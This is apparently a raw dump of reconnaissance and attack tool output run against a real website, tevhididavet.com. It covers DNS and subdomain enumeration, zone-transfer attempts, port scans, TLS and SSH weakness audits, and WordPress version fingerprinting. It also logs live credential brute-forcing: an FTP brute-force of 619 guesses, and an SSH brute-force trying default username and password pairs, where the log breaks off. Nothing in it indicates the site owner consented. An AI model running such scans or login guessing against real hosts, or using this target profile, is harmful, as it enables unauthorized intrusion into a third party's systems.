- com. 86400 IN RRSIG DS 8 1 86400 20190705170000 20190622160000 25266 . hZVgaad6BeN1+pEhS5cZmdGunxGTomU41NNkLYy9SgHsNr2xbisHPIdd HkUxgizLIfCR9FV+SJ3/UZ7Wzf/MEh/z5KeoqQBHs4llQk0y4AeHPG8c lxzTbXLjkJzBfjX5ECjkLQsNEgizlHBJ7IhybZr1cSXavZ+t+115MeVO y3TaZZhw9+oZvtYg/L/Ivxrsgd4DKCFZRb9xOEUE/49fyKc2O2Q/eT63 RaNq2f75jpWCAg7QBIJzycF03vJYgMSY1EehW2KWW8R6ctMNZv6GFwWH g2w18jWzgG4oQ6X/DW+MPvSRVmbk5MdfM3AMRwYfu2S5P7DqGASJs8ch esWfWQ==
- ;; Received 1176 bytes from 198.97.190.53#53(h.root-servers.net) in 315 ms
- tevhididavet.com. 172800 IN NS ns1.medyabim.com.
- tevhididavet.com. 172800 IN NS ns2.medyabim.com.
- CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
- CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20190628044430 20190621033430 3800 com. E0fw9vzA0DqWNYImFXrvmV/qH2cH6hDM5E7X6/pCKrhCZp7Qb6iCkp3u PdwVPv5HIs65MaMNSGA9gXCs4JcXBjUx6cmjKUbUfGX2kQffmFm6dGfA WvtjYvzFfG1o/0SUU5awr6hes1fa/G1RxwVW8a4AAdhZ/cPpFS2RTlar i/0=
- LDM6H571G220OG255GCIIQV6VRSRHTUG.com. 86400 IN NSEC3 1 1 0 - LDM9LBCLRJPGKAH44MC3P8BVCKS17TC6 NS DS RRSIG
- LDM6H571G220OG255GCIIQV6VRSRHTUG.com. 86400 IN RRSIG NSEC3 8 2 86400 20190627045744 20190620034744 3800 com. ksiqsrcti2+p6AwUFT93jp0pGEiDn6YCppWCKByE5HQX9VeHXSD6v97I DmVSZDwjH6bi1bMfIrw8sOLtVg5+w4hvt7Y+L2x0bxI8LAudO11gor+5 JaHdqIXBr4Qb53RfFk+m+q69So66fsPyY8UiUKHJAyqUQnuN/877k9oN M0c=
- ;; Received 607 bytes from 192.35.51.30#53(f.gtld-servers.net) in 218 ms
- tevhididavet.com. 14400 IN A 93.89.20.20
- tevhididavet.com. 14400 IN NS ns2.medyabim.com.
- tevhididavet.com. 14400 IN NS ns1.medyabim.com.
- ;; Received 138 bytes from 93.89.19.11#53(ns2.medyabim.com) in 266 ms
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: tevhididavet.com
- [-] DNSSEC is not configured for tevhididavet.com
- [*] SOA ns1.medyabim.com 93.89.16.11
- [*] NS ns2.medyabim.com 93.89.19.11
- [*] Bind Version for 93.89.19.11 get lost
- [*] NS ns1.medyabim.com 93.89.16.11
- [*] Bind Version for 93.89.16.11 get lost
- [*] MX mail.tevhididavet.com 93.89.20.20
- [*] A tevhididavet.com 93.89.20.20
- [*] TXT tevhididavet.com v=spf1 a mx ip4:93.89.20.20 ~all
- [*] Enumerating SRV Records
- [-] No SRV Records Found for tevhididavet.com
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain tevhididavet.com
- [*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
- [+] Getting nameservers
- 93.89.19.11 - ns2.medyabim.com
- 93.89.16.11 - ns1.medyabim.com
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 a mx ip4:93.89.20.20 ~all"
- [+] MX records found, added to target list
- 10 mail.tevhididavet.com.
- [*] Scanning tevhididavet.com for A records
- 93.89.20.20 - tevhididavet.com
- 93.89.20.20 - ftp.tevhididavet.com
- 93.89.20.20 - mail.tevhididavet.com
- 93.89.20.20 - pop.tevhididavet.com
- 93.89.20.20 - smtp.tevhididavet.com
- 93.89.20.20 - www.tevhididavet.com
- ######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 93.89.20.20 200 host ftp.tevhididavet.com Apache/2
- 93.89.20.20 200 host mail.tevhididavet.com Apache/2
- 93.89.20.20 200 host pop.tevhididavet.com Apache/2
- 93.89.20.20 200 host smtp.tevhididavet.com Apache/2
- 93.89.20.20 301 host www.tevhididavet.com Apache/2
- #######################################################################################################################################
- [+] Testing domain
- www.tevhididavet.com 93.89.20.20
- [+] Dns resolving
- Domain name Ip address Name server
- tevhididavet.com 93.89.20.20 93-89-20-20.static.internetadresi.com
- Found 1 host(s) for tevhididavet.com
- [+] Testing wildcard
- Ok, no wildcard found.
- [+] Scanning for subdomain on tevhididavet.com
- [!] Wordlist not specified. I scannig with my internal wordlist...
- Estimated time about 276.56 seconds
- Subdomain Ip address Name server
- ftp.tevhididavet.com 93.89.20.20 93-89-20-20.static.internetadresi.com
- mail.tevhididavet.com 93.89.20.20 93-89-20-20.static.internetadresi.com
- pop.tevhididavet.com 93.89.20.20 93-89-20-20.static.internetadresi.com
- smtp.tevhididavet.com 93.89.20.20 93-89-20-20.static.internetadresi.com
- www.tevhididavet.com 93.89.20.20 93-89-20-20.static.internetadresi.com
- #######################################################################################################################################
- AVAILABLE PLUGINS
- --------------------------------------------------------------------------------------------------------------------------------------
- OpenSslCcsInjectionPlugin
- FallbackScsvPlugin
- HeartbleedPlugin
- SessionRenegotiationPlugin
- RobotPlugin
- CertificateInfoPlugin
- EarlyDataPlugin
- SessionResumptionPlugin
- HttpHeadersPlugin
- OpenSslCipherSuitesPlugin
- CompressionPlugin
- CHECKING HOST(S) AVAILABILITY
- --------------------------------------------------------------------------------------------------------------------------------------
- 93.89.20.20:443 => 93.89.20.20
- SCAN RESULTS FOR 93.89.20.20:443 - 93.89.20.20
- --------------------------------------------------------------------------------------------------------------------------------------
- * Session Renegotiation:
- Client-initiated Renegotiation: OK - Rejected
- Secure Renegotiation: OK - Supported
- * ROBOT Attack:
- OK - Not vulnerable
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- * Downgrade Attacks:
- TLS_FALLBACK_SCSV: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * TLSV1 Cipher Suites:
- Forward Secrecy OK - Supported
- RC4 OK - Not Supported
- Preferred:
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- Accepted:
- TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- * OpenSSL CCS Injection:
- OK - Not vulnerable to OpenSSL CCS injection
- * TLSV1_3 Cipher Suites:
- Server rejected all cipher suites.
- * Certificate Information:
- Content
- SHA1 Fingerprint: cc53d0ba21499c11db3a649d597ffeaca7c9b70b
- Common Name: localhost
- Issuer: localhost
- Serial Number: 16496124031743550035
- Not Before: 2017-06-15 12:50:24
- Not After: 2044-10-30 12:50:24
- Signature Algorithm: sha1
- Public Key Algorithm: RSA
- Key Size: 2048
- Exponent: 65537 (0x10001)
- DNS Subject Alternative Names: []
- Trust
- Hostname Validation: FAILED - Certificate does NOT match 93.89.20.20
- Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
- iOS CA Store (12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
- Java CA Store (jdk-11.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
- macOS CA Store (12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla CA Store (2018-11-22): FAILED - Certificate is NOT Trusted: self signed certificate
- OPENJDK CA Store (jdk-11.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
- Windows CA Store (2018-12-08): FAILED - Certificate is NOT Trusted: self signed certificate
- Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
- Received Chain: localhost
- Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
- Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
- Received Chain Order: OK - Order is valid
- Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
- Extensions
- OCSP Must-Staple: NOT SUPPORTED - Extension not found
- Certificate Transparency: NOT SUPPORTED - Extension not found
- OCSP Stapling
- NOT SUPPORTED - Server did not send back an OCSP response
- * TLS 1.2 Session Resumption Support:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Tickets: OK - Supported
- * OpenSSL Heartbleed:
- OK - Not vulnerable to Heartbleed
- * Deflate Compression:
- OK - Compression disabled
- * TLSV1_1 Cipher Suites:
- Forward Secrecy OK - Supported
- RC4 OK - Not Supported
- Preferred:
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- Accepted:
- TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- * TLSV1_2 Cipher Suites:
- Forward Secrecy OK - Supported
- RC4 OK - Not Supported
- Preferred:
- TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
- Accepted:
- TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
- TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
- TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
- TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
- TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
- TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
- SCAN COMPLETED IN 25.70 S
- --------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- WhatWeb report for http://tevhididavet.com
- Status : 200 OK
- Title : Tevhidi Davet | Tevhide Davet Eder
- IP : 93.89.20.20
- Country : TURKEY, TR
- Summary : X-UA-Compatible[IE=edge], Script[application/ld+json,text/javascript], WordPress[5.2.2], HTML5, Open-Graph-Protocol[website], JQuery[1.11.1], MetaGenerator[WordPress 5.2.2], Google-Analytics[Universal][UA-62835212-1], UncommonHeaders[upgrade,link], HTTPServer[Apache/2], All-in-one-SEO-Pack[2.12.1], Apache[2]
- Detected Plugins:
- [ All-in-one-SEO-Pack ]
- The all in one SEO pack automatically optimizes your
- WordPress blog for Search Engines (Search Engine
- Optimization).
- Version : 2.12.1
- Website : http://wordpress.org/extend/plugins/all-in-one-seo-pack/
- [ Apache ]
- The Apache HTTP Server Project is an effort to develop and
- maintain an open-source HTTP server for modern operating
- systems including UNIX and Windows NT. The goal of this
- project is to provide a secure, efficient and extensible
- server that provides HTTP services in sync with the current
- HTTP standards.
- Version : 2 (from HTTP Server Header)
- Google Dorks: (3)
- Website : http://httpd.apache.org/
- [ Google-Analytics ]
- This plugin identifies the Google Analytics account.
- Version : Universal
- Account : UA-62835212-1
- Website : http://www.google.com/analytics/
- [ HTML5 ]
- HTML version 5, detected by the doctype declaration
- [ HTTPServer ]
- HTTP server header string. This plugin also attempts to
- identify the operating system from the server header.
- String : Apache/2 (from server string)
- [ JQuery ]
- A fast, concise, JavaScript that simplifies how to traverse
- HTML documents, handle events, perform animations, and add
- AJAX.
- Version : 1.11.1
- Website : http://jquery.com/
- [ MetaGenerator ]
- This plugin identifies meta generator tags and extracts its
- value.
- String : WordPress 5.2.2
- [ Open-Graph-Protocol ]
- The Open Graph protocol enables you to integrate your Web
- pages into the social graph. It is currently designed for
- Web pages representing profiles of real-world things .
- things like movies, sports teams, celebrities, and
- restaurants. Including Open Graph tags on your Web page,
- makes your page equivalent to a Facebook Page.
- Version : website
- [ Script ]
- This plugin detects instances of script HTML elements and
- returns the script language/type.
- String : application/ld+json,text/javascript
- [ UncommonHeaders ]
- Uncommon HTTP server headers. The blacklist includes all
- the standard headers and many non standard but common ones.
- Interesting but fairly common headers should have their own
- plugins, eg. x-powered-by, server and x-aspnet-version.
- Info about headers can be found at www.http-stats.com
- String : upgrade,link (from headers)
- [ WordPress ]
- WordPress is an opensource blogging system commonly used as
- a CMS.
- Version : 5.2.2
- Aggressive function available (check plugin file or details).
- Google Dorks: (1)
- Website : http://www.wordpress.org/
- [ X-UA-Compatible ]
- This plugin retrieves the X-UA-Compatible value from the
- HTTP header and meta http-equiv tag. - More Info:
- http://msdn.microsoft.com/en-us/library/cc817574.aspx
- String : IE=edge
- HTTP Headers:
- HTTP/1.1 200 OK
- Date: Sun, 23 Jun 2019 00:19:03 GMT
- Server: Apache/2
- Upgrade: h2,h2c
- Connection: Upgrade, close
- Link: <http://tevhididavet.com/wp-json/>; rel="https://api.w.org/"
- Vary: Accept-Encoding,User-Agent
- Content-Encoding: gzip
- Content-Length: 13443
- Content-Type: text/html; charset=UTF-8
- #######################################################################################################################################
- DNS Servers for tevhididavet.com:
- ns2.medyabim.com
- ns1.medyabim.com
- Trying zone transfer first...
- Testing ns2.medyabim.com
- Request timed out or transfer not allowed.
- Testing ns1.medyabim.com
- Request timed out or transfer not allowed.
- Unsuccessful in zone transfer (it was worth a shot)
- Okay, trying the good old fashioned way... brute force
- Checking for wildcard DNS...
- Nope. Good.
- Now performing 2280 test(s)...
- 93.89.20.20 ftp.tevhididavet.com
- 93.89.20.20 mail.tevhididavet.com
- 93.89.20.20 pop.tevhididavet.com
- 93.89.20.20 smtp.tevhididavet.com
- 93.89.20.20 www.tevhididavet.com
- Subnets found (may want to probe here using nmap or unicornscan):
- 93.89.20.0-255 : 5 hostnames found.
- Done with Fierce scan: http://ha.ckers.org/fierce/
- Found 5 entries.
- Have a nice day.
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- tevhididavet.com -----
- Host's addresses:
- __________________
- tevhididavet.com. 12026 IN A 93.89.20.20
- Name Servers:
- ______________
- ns1.medyabim.com. 86191 IN A 93.89.16.11
- ns2.medyabim.com. 86191 IN A 93.89.19.11
- Mail (MX) Servers:
- ___________________
- mail.tevhididavet.com. 12707 IN A 93.89.20.20
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for tevhididavet.com on ns1.medyabim.com ...
- Trying Zone Transfer for tevhididavet.com on ns2.medyabim.com ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 19:47 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- Not shown: 339 closed ports, 124 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 19:47 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.25s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- Not shown: 11 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- Nmap done: 1 IP address (1 host up) scanned in 6.67 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 19:48 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 619 guesses in 191 seconds, average tps: 3.1
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 (92%), Linux 3.4 - 3.10 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 (90%), Linux 3.11 (90%), Linux 3.2 (90%), Linux 3.5 (90%), Linux 3.8 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 169.29 ms 10.253.200.1
- 2 165.04 ms 213.184.122.97
- 3 164.52 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
- 4 164.58 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
- 5 217.13 ms bzq-219-189-230.dsl.bezeqint.net (62.219.189.230)
- 6 215.01 ms bzq-219-189-78.cablep.bezeqint.net (62.219.189.78)
- 7 214.97 ms et-0-0-37.cr10-fra2.ip4.gtt.net (89.149.180.49)
- 8 217.22 ms ip4.gtt.net (213.254.196.10)
- 9 226.58 ms ip4.gtt.net (213.254.196.10)
- 10 214.88 ms ip4.gtt.net (213.254.196.10)
- 11 230.66 ms ffm-s1-rou-1101.DE.eurorings.net (134.222.48.160)
- 12 265.64 ms 93-89-20-20.static.internetadresi.com (93.89.20.20)
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_7.4
- (gen) software: OpenSSH 7.4
- (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) curve25519-sha256 -- [warn] unknown algorithm
- (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
- (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- # message authentication code algorithms
- (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # algorithm recommendations (for OpenSSH 7.4)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) -umac-128@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
- (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 19:52 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
